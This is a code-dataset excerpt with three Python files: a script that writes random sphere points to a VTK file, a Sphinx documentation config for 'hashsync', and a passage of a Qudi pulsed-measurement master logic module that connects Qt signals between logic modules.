code stringlengths 3 1.05M | repo_name stringlengths 5 104 | path stringlengths 4 251 | language stringclasses 1 value | license stringclasses 15 values | size int64 3 1.05M |
|---|---|---|---|---|---|
from math import pi, cos, sin
from random import random
class Point:
def __init__(self, x, y, z):
self.x = x
self.y = y
self.z = z
filename = "sphere.vtk"
f = open(filename, "w")
print(filename)
vp = []
for i in range(10000):
z = random() * 2.0 - 1.0
s = random() * 2.0 * pi
x = (1 - z**2)**0.5 * cos(s)
y = (1 - z**2)**0.5 * sin(s)
vp.append(Point(x, y, z))
f.write(f"""\
# vtk DataFile Version 2.0
unstructured
ASCII
DATASET UNSTRUCTURED_GRID
POINTS {len(vp)} float
""")
for v in vp:
f.write(f"{v.x} {v.y} {v.z}\n")
f.write(f"""\
POINT_DATA {len(vp)}
VECTORS vector float
""")
for v in vp:
f.write(f"{v.y} {-v.x} 0\n")
f.write("SCALARS z float\n")
f.write("LOOKUP_TABLE defalut\n")
for v in vp:
f.write(f"{v.z}\n")
| kaityo256/paraview-sample | unstructured/sphere.py | Python | mit | 787 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# hashsync documentation build configuration file, created by
# sphinx-quickstart on Tue Jul 9 22:26:36 2013.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
# If extensions (or modules to document with autodoc) are in another
# directory, add these directories to sys.path here. If the directory is
# relative to the documentation root, use os.path.abspath to make it
# absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# Get the project root dir, which is the parent dir of this
cwd = os.getcwd()
project_root = os.path.dirname(cwd)
# Insert the project root dir as the first element in the PYTHONPATH.
# This lets us ensure that the source package is imported, and that its
# version is used.
sys.path.insert(0, project_root)
import hashsync
# -- General configuration ---------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.viewcode']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'hashsync'
copyright = u'2014, Chris AtLee'
# The version info for the project you're documenting, acts as replacement
# for |version| and |release|, also used in various other places throughout
# the built documents.
#
# The short X.Y version.
version = hashsync.__version__
# The full version, including alpha/beta/rc tags.
release = hashsync.__version__
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to
# some non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built
# documents.
#keep_warnings = False
# -- Options for HTML output -------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a
# theme further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as
# html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the
# top of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon
# of the docs. This file should be a Windows icon file (.ico) being
# 16x16 or 32x32 pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets)
# here, relative to this directory. They are copied after the builtin
# static files, so a file named "default.css" will overwrite the builtin
# "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page
# bottom, using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names
# to template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer.
# Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer.
# Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages
# will contain a <link> tag referring to it. The value of this option
# must be the base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'hashsyncdoc'
# -- Options for LaTeX output ------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass
# [howto/manual]).
latex_documents = [
('index', 'hashsync.tex',
u'hashsync Documentation',
u'Chris AtLee', 'manual'),
]
# The name of an image file (relative to this directory) to place at
# the top of the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings
# are parts, not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'hashsync',
u'hashsync Documentation',
[u'Chris AtLee'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ----------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'hashsync',
u'hashsync Documentation',
u'Chris AtLee',
'hashsync',
'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
| catlee/hashsync | docs/conf.py | Python | bsd-3-clause | 8,396 |
# -*- coding: utf-8 -*-
"""
Master logic to combine sequence_generator_logic and pulsed_measurement_logic to be
used with a single GUI.
QuDi is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
QuDi is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with QuDi. If not, see <http://www.gnu.org/licenses/>.
Copyright (c) the Qudi Developers. See the COPYRIGHT.txt file at the
top-level directory of this distribution and at <https://github.com/Ulm-IQO/qudi/>
"""
from logic.generic_logic import GenericLogic
from pyqtgraph.Qt import QtCore
from collections import OrderedDict
import numpy as np
class PulsedMasterLogic(GenericLogic):
"""
This logic module controls the sequence/waveform generation and management via
sequence_generator_logic and pulsed measurements via pulsed_measurement_logic.
Basically glue logic to pass information between logic modules.
"""
# pulsed_measurement_logic signals
sigLaserToShowChanged = QtCore.Signal(int, bool)
sigDoFit = QtCore.Signal(str)
sigStartMeasurement = QtCore.Signal()
sigStopMeasurement = QtCore.Signal()
sigPauseMeasurement = QtCore.Signal()
sigContinueMeasurement = QtCore.Signal()
sigStartPulser = QtCore.Signal()
sigStopPulser = QtCore.Signal()
sigFastCounterSettingsChanged = QtCore.Signal(float, float)
sigMeasurementSequenceSettingsChanged = QtCore.Signal(np.ndarray, int, float, list, bool, float)
sigPulseGeneratorSettingsChanged = QtCore.Signal(float, str, dict, bool)
sigUploadAsset = QtCore.Signal(str)
sigLoadAsset = QtCore.Signal(str, dict)
sigClearPulseGenerator = QtCore.Signal()
sigExtMicrowaveSettingsChanged = QtCore.Signal(float, float, bool)
sigExtMicrowaveStartStop = QtCore.Signal(bool)
sigTimerIntervalChanged = QtCore.Signal(float)
sigAnalysisWindowsChanged = QtCore.Signal(int, int, int, int)
sigManuallyPullData = QtCore.Signal()
sigRequestMeasurementInitValues = QtCore.Signal()
sigAnalysisMethodChanged = QtCore.Signal(float)
# sequence_generator_logic signals
sigSavePulseBlock = QtCore.Signal(str, object)
sigSaveBlockEnsemble = QtCore.Signal(str, object)
sigSaveSequence = QtCore.Signal(str, object)
sigDeletePulseBlock = QtCore.Signal(str)
sigDeleteBlockEnsemble = QtCore.Signal(str)
sigDeleteSequence = QtCore.Signal(str)
sigLoadPulseBlock = QtCore.Signal(str)
sigLoadBlockEnsemble = QtCore.Signal(str)
sigLoadSequence = QtCore.Signal(str)
sigSampleBlockEnsemble = QtCore.Signal(str, bool, bool)
sigSampleSequence = QtCore.Signal(str, bool, bool)
sigGeneratorSettingsChanged = QtCore.Signal(list, str, float, dict)
sigRequestGeneratorInitValues = QtCore.Signal()
sigGeneratePredefinedSequence = QtCore.Signal(str, list)
# signals for master module (i.e. GUI)
sigSavedPulseBlocksUpdated = QtCore.Signal(dict)
sigSavedBlockEnsemblesUpdated = QtCore.Signal(dict)
sigSavedSequencesUpdated = QtCore.Signal(dict)
sigCurrentPulseBlockUpdated = QtCore.Signal(object)
sigCurrentBlockEnsembleUpdated = QtCore.Signal(object)
sigCurrentSequenceUpdated = QtCore.Signal(object)
sigBlockEnsembleSampled = QtCore.Signal(str)
sigSequenceSampled = QtCore.Signal(str)
sigGeneratorSettingsUpdated = QtCore.Signal(str, list, float, dict, str)
sigPredefinedSequencesUpdated = QtCore.Signal(dict)
sigPredefinedSequenceGenerated = QtCore.Signal(str)
sigSignalDataUpdated = QtCore.Signal(np.ndarray, np.ndarray, np.ndarray, np.ndarray, np.ndarray)
sigLaserDataUpdated = QtCore.Signal(np.ndarray, np.ndarray)
sigLaserToShowUpdated = QtCore.Signal(int, bool)
sigElapsedTimeUpdated = QtCore.Signal(float, str)
sigFitUpdated = QtCore.Signal(str, np.ndarray, np.ndarray, dict, object)
sigMeasurementStatusUpdated = QtCore.Signal(bool, bool)
sigPulserRunningUpdated = QtCore.Signal(bool)
sigFastCounterSettingsUpdated = QtCore.Signal(float, float)
sigMeasurementSequenceSettingsUpdated = QtCore.Signal(np.ndarray, int, float, list, bool, float)
sigPulserSettingsUpdated = QtCore.Signal(float, str, list, dict, bool)
sigAssetUploaded = QtCore.Signal(str)
sigUploadedAssetsUpdated = QtCore.Signal(list)
sigLoadedAssetUpdated = QtCore.Signal(str, str)
sigExtMicrowaveSettingsUpdated = QtCore.Signal(float, float, bool)
sigExtMicrowaveRunningUpdated = QtCore.Signal(bool)
sigTimerIntervalUpdated = QtCore.Signal(float)
sigAnalysisWindowsUpdated = QtCore.Signal(int, int, int, int)
sigAnalysisMethodUpdated = QtCore.Signal(float)
_modclass = 'pulsedmasterlogic'
_modtype = 'logic'
# declare connectors
_in = {'pulsedmeasurementlogic': 'PulsedMeasurementLogic',
'sequencegeneratorlogic': 'SequenceGeneratorLogic',
}
_out = {'pulsedmasterlogic': 'PulsedMasterLogic'}
def __init__(self, **kwargs):
""" Create PulsedMasterLogic object with connectors.
@param dict kwargs: optional parameters
"""
super().__init__(**kwargs)
def on_activate(self, e):
""" Initialisation performed during activation of the module.
@param object e: Fysom state change event
"""
self._measurement_logic = self.get_in_connector('pulsedmeasurementlogic')
self._generator_logic = self.get_in_connector('sequencegeneratorlogic')
# Signals controlling the pulsed_measurement_logic
self.sigRequestMeasurementInitValues.connect(self._measurement_logic.request_init_values,
QtCore.Qt.QueuedConnection)
self.sigMeasurementSequenceSettingsChanged.connect(
self._measurement_logic.set_pulse_sequence_properties, QtCore.Qt.QueuedConnection)
self.sigFastCounterSettingsChanged.connect(
self._measurement_logic.set_fast_counter_settings, QtCore.Qt.QueuedConnection)
self.sigExtMicrowaveSettingsChanged.connect(self._measurement_logic.set_microwave_params,
QtCore.Qt.QueuedConnection)
self.sigExtMicrowaveStartStop.connect(self._measurement_logic.microwave_on_off,
QtCore.Qt.QueuedConnection)
self.sigPulseGeneratorSettingsChanged.connect(
self._measurement_logic.set_pulse_generator_settings, QtCore.Qt.QueuedConnection)
self.sigAnalysisWindowsChanged.connect(self._measurement_logic.set_analysis_windows,
QtCore.Qt.QueuedConnection)
self.sigDoFit.connect(self._measurement_logic.do_fit, QtCore.Qt.QueuedConnection)
self.sigTimerIntervalChanged.connect(self._measurement_logic.set_timer_interval,
QtCore.Qt.QueuedConnection)
self.sigManuallyPullData.connect(self._measurement_logic.manually_pull_data,
QtCore.Qt.QueuedConnection)
self.sigStartMeasurement.connect(self._measurement_logic.start_pulsed_measurement,
QtCore.Qt.QueuedConnection)
self.sigStopMeasurement.connect(self._measurement_logic.stop_pulsed_measurement,
QtCore.Qt.QueuedConnection)
self.sigPauseMeasurement.connect(self._measurement_logic.pause_pulsed_measurement,
QtCore.Qt.QueuedConnection)
self.sigContinueMeasurement.connect(self._measurement_logic.pause_pulsed_measurement,
QtCore.Qt.QueuedConnection)
self.sigStartPulser.connect(self._measurement_logic.pulse_generator_on,
QtCore.Qt.QueuedConnection)
self.sigStopPulser.connect(self._measurement_logic.pulse_generator_off,
QtCore.Qt.QueuedConnection)
self.sigClearPulseGenerator.connect(self._measurement_logic.clear_pulser,
QtCore.Qt.QueuedConnection)
self.sigUploadAsset.connect(self._measurement_logic.upload_asset,
QtCore.Qt.QueuedConnection)
self.sigLoadAsset.connect(self._measurement_logic.load_asset, QtCore.Qt.QueuedConnection)
self.sigLaserToShowChanged.connect(self._measurement_logic.set_laser_to_show,
QtCore.Qt.QueuedConnection)
self.sigAnalysisMethodChanged.connect(self._measurement_logic.analysis_method_changed,
QtCore.Qt.QueuedConnection)
# Signals controlling the sequence_generator_logic
self.sigRequestGeneratorInitValues.connect(self._generator_logic.request_init_values,
QtCore.Qt.QueuedConnection)
self.sigSavePulseBlock.connect(self._generator_logic.save_block, QtCore.Qt.QueuedConnection)
self.sigSaveBlockEnsemble.connect(self._generator_logic.save_ensemble,
QtCore.Qt.QueuedConnection)
self.sigSaveSequence.connect(self._generator_logic.save_sequence,
QtCore.Qt.QueuedConnection)
self.sigLoadPulseBlock.connect(self._generator_logic.load_block, QtCore.Qt.QueuedConnection)
self.sigLoadBlockEnsemble.connect(self._generator_logic.load_ensemble,
QtCore.Qt.QueuedConnection)
self.sigLoadSequence.connect(self._generator_logic.load_sequence,
QtCore.Qt.QueuedConnection)
self.sigDeletePulseBlock.connect(self._generator_logic.delete_block,
QtCore.Qt.QueuedConnection)
self.sigDeleteBlockEnsemble.connect(self._generator_logic.delete_ensemble,
QtCore.Qt.QueuedConnection)
self.sigDeleteSequence.connect(self._generator_logic.delete_sequence,
QtCore.Qt.QueuedConnection)
self.sigSampleBlockEnsemble.connect(self._generator_logic.sample_pulse_block_ensemble,
QtCore.Qt.QueuedConnection)
self.sigSampleSequence.connect(self._generator_logic.sample_pulse_sequence,
QtCore.Qt.QueuedConnection)
self.sigGeneratorSettingsChanged.connect(self._generator_logic.set_settings,
QtCore.Qt.QueuedConnection)
self.sigGeneratePredefinedSequence.connect(
self._generator_logic.generate_predefined_sequence, QtCore.Qt.QueuedConnection)
# connect signals coming from the pulsed_measurement_logic
self._measurement_logic.sigSignalDataUpdated.connect(self.signal_data_updated,
QtCore.Qt.QueuedConnection)
self._measurement_logic.sigLaserDataUpdated.connect(self.laser_data_updated,
QtCore.Qt.QueuedConnection)
self._measurement_logic.sigLaserToShowUpdated.connect(self.laser_to_show_updated,
QtCore.Qt.QueuedConnection)
self._measurement_logic.sigElapsedTimeUpdated.connect(self.measurement_time_updated,
QtCore.Qt.QueuedConnection)
self._measurement_logic.sigFitUpdated.connect(self.fit_updated, QtCore.Qt.QueuedConnection)
self._measurement_logic.sigMeasurementRunningUpdated.connect(
self.measurement_status_updated, QtCore.Qt.QueuedConnection)
self._measurement_logic.sigPulserRunningUpdated.connect(self.pulser_running_updated,
QtCore.Qt.QueuedConnection)
self._measurement_logic.sigFastCounterSettingsUpdated.connect(
self.fast_counter_settings_updated, QtCore.Qt.QueuedConnection)
self._measurement_logic.sigPulseSequenceSettingsUpdated.connect(
self.measurement_sequence_settings_updated, QtCore.Qt.QueuedConnection)
self._measurement_logic.sigPulseGeneratorSettingsUpdated.connect(
self.pulse_generator_settings_updated, QtCore.Qt.QueuedConnection)
self._measurement_logic.sigUploadAssetComplete.connect(self.upload_asset_finished,
QtCore.Qt.QueuedConnection)
self._measurement_logic.sigUploadedAssetsUpdated.connect(self.uploaded_assets_updated,
QtCore.Qt.QueuedConnection)
self._measurement_logic.sigLoadedAssetUpdated.connect(self.loaded_asset_updated,
QtCore.Qt.QueuedConnection)
self._measurement_logic.sigExtMicrowaveSettingsUpdated.connect(
self.ext_microwave_settings_updated, QtCore.Qt.QueuedConnection)
self._measurement_logic.sigExtMicrowaveRunningUpdated.connect(
self.ext_microwave_running_updated, QtCore.Qt.QueuedConnection)
self._measurement_logic.sigTimerIntervalUpdated.connect(self.analysis_interval_updated,
QtCore.Qt.QueuedConnection)
self._measurement_logic.sigAnalysisWindowsUpdated.connect(self.analysis_windows_updated,
QtCore.Qt.QueuedConnection)
self._measurement_logic.sigAnalysisMethodUpdated.connect(self.analysis_method_updated,
QtCore.Qt.QueuedConnection)
# connect signals coming from the sequence_generator_logic
self._generator_logic.sigBlockDictUpdated.connect(self.saved_pulse_blocks_updated,
QtCore.Qt.QueuedConnection)
self._generator_logic.sigEnsembleDictUpdated.connect(self.saved_block_ensembles_updated,
QtCore.Qt.QueuedConnection)
self._generator_logic.sigSequenceDictUpdated.connect(self.saved_sequences_updated,
QtCore.Qt.QueuedConnection)
self._generator_logic.sigSampleEnsembleComplete.connect(self.sample_ensemble_finished,
QtCore.Qt.QueuedConnection)
self._generator_logic.sigSampleSequenceComplete.connect(self.sample_sequence_finished,
QtCore.Qt.QueuedConnection)
self._generator_logic.sigCurrentBlockUpdated.connect(self.current_pulse_block_updated,
QtCore.Qt.QueuedConnection)
self._generator_logic.sigCurrentEnsembleUpdated.connect(self.current_block_ensemble_updated,
QtCore.Qt.QueuedConnection)
self._generator_logic.sigCurrentSequenceUpdated.connect(self.current_sequence_updated,
QtCore.Qt.QueuedConnection)
self._generator_logic.sigSettingsUpdated.connect(self.generator_settings_updated,
QtCore.Qt.QueuedConnection)
self._generator_logic.sigPredefinedSequencesUpdated.connect(
self.predefined_sequences_updated, QtCore.Qt.QueuedConnection)
self._generator_logic.sigPredefinedSequenceGenerated.connect(
self.predefined_sequence_generated, QtCore.Qt.QueuedConnection)
self.status_dict = OrderedDict()
self.status_dict['sauplo_busy'] = False
self.status_dict['loading_busy'] = False
self.status_dict['upload_busy'] = False
self.status_dict['sampling_busy'] = False
self.status_dict['pulser_running'] = False
self.status_dict['measurement_running'] = False
def on_deactivate(self, e):
"""
@param e:
@return:
"""
# Disconnect all signals
# Signals controlling the pulsed_measurement_logic
self.sigRequestMeasurementInitValues.disconnect()
self.sigMeasurementSequenceSettingsChanged.disconnect()
self.sigFastCounterSettingsChanged.disconnect()
self.sigExtMicrowaveSettingsChanged.disconnect()
self.sigExtMicrowaveStartStop.disconnect()
self.sigPulseGeneratorSettingsChanged.disconnect()
self.sigAnalysisWindowsChanged.disconnect()
self.sigDoFit.disconnect()
self.sigTimerIntervalChanged.disconnect()
self.sigManuallyPullData.disconnect()
self.sigStartMeasurement.disconnect()
self.sigStopMeasurement.disconnect()
self.sigPauseMeasurement.disconnect()
self.sigContinueMeasurement.disconnect()
self.sigStartPulser.disconnect()
self.sigStopPulser.disconnect()
self.sigClearPulseGenerator.disconnect()
self.sigUploadAsset.disconnect()
self.sigLoadAsset.disconnect()
self.sigLaserToShowChanged.disconnect()
self.sigAnalysisMethodChanged.disconnect()
# Signals controlling the sequence_generator_logic
self.sigRequestGeneratorInitValues.disconnect()
self.sigSavePulseBlock.disconnect()
self.sigSaveBlockEnsemble.disconnect()
self.sigSaveSequence.disconnect()
self.sigLoadPulseBlock.disconnect()
self.sigLoadBlockEnsemble.disconnect()
self.sigLoadSequence.disconnect()
self.sigDeletePulseBlock.disconnect()
self.sigDeleteBlockEnsemble.disconnect()
self.sigDeleteSequence.disconnect()
self.sigSampleBlockEnsemble.disconnect()
self.sigSampleSequence.disconnect()
self.sigGeneratorSettingsChanged.disconnect()
self.sigGeneratePredefinedSequence.disconnect()
# Signals coming from the pulsed_measurement_logic
self._measurement_logic.sigSignalDataUpdated.disconnect()
self._measurement_logic.sigLaserDataUpdated.disconnect()
self._measurement_logic.sigLaserToShowUpdated.disconnect()
self._measurement_logic.sigElapsedTimeUpdated.disconnect()
self._measurement_logic.sigFitUpdated.disconnect()
self._measurement_logic.sigMeasurementRunningUpdated.disconnect()
self._measurement_logic.sigPulserRunningUpdated.disconnect()
self._measurement_logic.sigFastCounterSettingsUpdated.disconnect()
self._measurement_logic.sigPulseSequenceSettingsUpdated.disconnect()
self._measurement_logic.sigPulseGeneratorSettingsUpdated.disconnect()
self._measurement_logic.sigUploadedAssetsUpdated.disconnect()
self._measurement_logic.sigLoadedAssetUpdated.disconnect()
self._measurement_logic.sigExtMicrowaveSettingsUpdated.disconnect()
self._measurement_logic.sigExtMicrowaveRunningUpdated.disconnect()
self._measurement_logic.sigTimerIntervalUpdated.disconnect()
self._measurement_logic.sigAnalysisWindowsUpdated.disconnect()
self._measurement_logic.sigAnalysisMethodUpdated.disconnect()
# Signals coming from the sequence_generator_logic
self._generator_logic.sigBlockDictUpdated.disconnect()
self._generator_logic.sigEnsembleDictUpdated.disconnect()
self._generator_logic.sigSequenceDictUpdated.disconnect()
self._generator_logic.sigSampleEnsembleComplete.disconnect()
self._generator_logic.sigSampleSequenceComplete.disconnect()
self._generator_logic.sigCurrentBlockUpdated.disconnect()
self._generator_logic.sigCurrentEnsembleUpdated.disconnect()
self._generator_logic.sigCurrentSequenceUpdated.disconnect()
self._generator_logic.sigSettingsUpdated.disconnect()
self._generator_logic.sigPredefinedSequencesUpdated.disconnect()
self._generator_logic.sigPredefinedSequenceGenerated.disconnect()
return
#######################################################################
### Pulsed measurement methods ###
#######################################################################
def request_measurement_init_values(self):
"""
@return:
"""
self.sigRequestMeasurementInitValues.emit()
return
def get_hardware_constraints(self):
"""
@return:
"""
fastcounter_constraints = self._measurement_logic.get_fastcounter_constraints()
pulsegenerator_constraints = self._measurement_logic.get_pulser_constraints()
return pulsegenerator_constraints, fastcounter_constraints
def get_fit_functions(self):
"""
@param functions_list:
@return:
"""
return self._measurement_logic.get_fit_functions()
def measurement_sequence_settings_changed(self, measurement_ticks, number_of_lasers,
sequence_length_s, laser_ignore_list, alternating,
laser_trigger_delay):
"""
@param measurement_ticks:
@param number_of_lasers:
@param sequence_length_s:
@param laser_ignore_list:
@param alternating:
@param laser_trigger_delay:
@return:
"""
self.sigMeasurementSequenceSettingsChanged.emit(measurement_ticks, number_of_lasers,
sequence_length_s, laser_ignore_list,
alternating, laser_trigger_delay)
return
def measurement_sequence_settings_updated(self, measurement_ticks, number_of_lasers,
sequence_length_s, laser_ignore_list, alternating,
laser_trigger_delay):
"""
@param measurement_ticks:
@param number_of_lasers:
@param sequence_length_s:
@param laser_ignore_list:
@param alternating:
@param laser_trigger_delay:
@return:
"""
self.sigMeasurementSequenceSettingsUpdated.emit(measurement_ticks, number_of_lasers,
sequence_length_s, laser_ignore_list,
alternating, laser_trigger_delay)
return
def fast_counter_settings_changed(self, bin_width_s, record_length_s):
"""
@param bin_width_s:
@param record_length_s:
@return:
"""
self.sigFastCounterSettingsChanged.emit(bin_width_s, record_length_s)
return
def fast_counter_settings_updated(self, bin_width_s, record_length_s):
"""
@param bin_width_s:
@param record_length_s:
@param number_of_lasers:
@return:
"""
self.sigFastCounterSettingsUpdated.emit(bin_width_s, record_length_s)
return
def ext_microwave_settings_changed(self, frequency_hz, power_dbm, use_ext_microwave):
"""
@param frequency_hz:
@param power_dbm:
@param use_ext_microwave:
@return:
"""
self.sigExtMicrowaveSettingsChanged.emit(frequency_hz, power_dbm, use_ext_microwave)
return
def ext_microwave_settings_updated(self, frequency_hz, power_dbm, use_ext_microwave):
"""
@param frequency_hz:
@param power_dbm:
@param use_ext_microwave:
@return:
"""
self.sigExtMicrowaveSettingsUpdated.emit(frequency_hz, power_dbm, use_ext_microwave)
return
def ext_microwave_toggled(self, output_on):
"""
@param output_on:
@return:
"""
self.sigExtMicrowaveStartStop.emit(output_on)
return
def ext_microwave_running_updated(self, is_running):
"""
@param is_running:
@return:
"""
self.status_dict['microwave_running'] = is_running
self.sigExtMicrowaveRunningUpdated.emit(is_running)
return
def pulse_generator_settings_changed(self, sample_rate_hz, activation_config_name,
analogue_amplitude, interleave_on):
"""
@param sample_rate_hz:
@param activation_config_name:
@param analogue_amplitude:
@param interleave_on:
@return:
"""
self.sigPulseGeneratorSettingsChanged.emit(sample_rate_hz, activation_config_name,
analogue_amplitude, interleave_on)
return
def pulse_generator_settings_updated(self, sample_rate_hz, activation_config_name,
analogue_amplitude, interleave_on):
"""
@param sample_rate_hz:
@param activation_config_name:
@param analogue_amplitude:
@param interleave_on:
@return:
"""
activation_config = self._measurement_logic.get_pulser_constraints()['activation_config'][
activation_config_name]
self.sigPulserSettingsUpdated.emit(sample_rate_hz, activation_config_name,
activation_config, analogue_amplitude, interleave_on)
return
def analysis_windows_changed(self, signal_start_bin, signal_width_bins, norm_start_bin,
norm_width_bins):
"""
@param signal_start_bin:
@param signal_width_bins:
@param norm_start_bin:
@param norm_width_bins:
@return:
"""
self.sigAnalysisWindowsChanged.emit(signal_start_bin, signal_width_bins, norm_start_bin,
norm_width_bins)
return
def analysis_windows_updated(self, signal_start_bin, signal_width_bins, norm_start_bin,
norm_width_bins):
"""
@param signal_start_bin:
@param signal_width_bins:
@param norm_start_bin:
@param norm_width_bins:
@return:
"""
self.sigAnalysisWindowsUpdated.emit(signal_start_bin, signal_width_bins, norm_start_bin,
norm_width_bins)
return
def do_fit(self, fit_function):
"""
@param fit_function:
@return:
"""
self.sigDoFit.emit(fit_function)
return
def fit_updated(self, fit_function, fit_data_x, fit_data_y, param_dict, result_dict):
"""
@param fit_function:
@param fit_data_x:
@param fit_data_y:
@param param_dict:
@param result_dict:
@return:
"""
self.sigFitUpdated.emit(fit_function, fit_data_x, fit_data_y, param_dict, result_dict)
return
def analysis_interval_changed(self, analysis_interval_s):
"""
@param analysis_interval_s:
@return:
"""
self.sigTimerIntervalChanged.emit(analysis_interval_s)
return
def analysis_interval_updated(self, analysis_interval_s):
"""
@param analysis_interval_s:
@return:
"""
self.sigTimerIntervalUpdated.emit(analysis_interval_s)
return
def manually_pull_data(self):
"""
@return:
"""
self.sigManuallyPullData.emit()
return
def start_measurement(self):
"""
@return:
"""
#if self.manual_xaxis_def:
#if self.manual_laser_def:
self.sigStartMeasurement.emit()
return
def stop_measurement(self):
"""
@return:
"""
self.sigStopMeasurement.emit()
return
def pause_measurement(self):
"""
@return:
"""
self.sigPauseMeasurement.emit()
return
def continue_measurement(self):
"""
@return:
"""
self.sigContinueMeasurement.emit()
return
def measurement_status_updated(self, is_running, is_paused):
"""
@param is_running:
@param is_paused:
@return:
"""
self.status_dict['measurement_running'] = is_running
self.sigMeasurementStatusUpdated.emit(is_running, is_paused)
return
def measurement_time_updated(self, elapsed_time, elapsed_time_string):
"""
@param elapsed_time:
@param elapsed_time_string:
@return:
"""
self.sigElapsedTimeUpdated.emit(elapsed_time, elapsed_time_string)
return
def toggle_pulse_generator(self, switch_on):
"""
@param switch_on:
@return:
"""
if switch_on:
self.sigStartPulser.emit()
else:
self.sigStopPulser.emit()
return
def pulser_running_updated(self, is_running):
"""
@param is_running:
@return:
"""
self.status_dict['pulser_running'] = is_running
self.sigPulserRunningUpdated.emit(is_running)
return
def save_measurement_data(self, save_tag):
"""
@param save_tag:
@return:
"""
self._measurement_logic.save_measurement_data(save_tag)
return
def clear_pulse_generator(self):
"""
@return:
"""
self.sigClearPulseGenerator.emit()
return
def upload_asset(self, asset_name):
"""
@param asset_name:
@return:
"""
self.status_dict['upload_busy'] = True
self.sigUploadAsset.emit(asset_name)
return
def upload_asset_finished(self, asset_name):
"""
@param asset_name:
@return:
"""
if self.status_dict['sauplo_busy']:
self.load_asset_into_channels(asset_name)
self.log.debug('PULSEDMASTER: Asset "{0}" uploaded!'.format(asset_name))
self.status_dict['upload_busy'] = False
self.sigAssetUploaded.emit(asset_name)
return
def uploaded_assets_updated(self, asset_names_list):
"""
@param asset_names_list:
@return:
"""
self.sigUploadedAssetsUpdated.emit(asset_names_list)
return
def load_asset_into_channels(self, asset_name, load_dict={}, invoke_settings=False):
"""
@param asset_name:
@param load_dict:
@param bool invoke_settings: Specifies whether the measurement parameters should be chosen
according to the loaded assets metadata.
@return:
"""
# FIXME: implement that! Changes in Pulse objects and measurement logic parameters needed
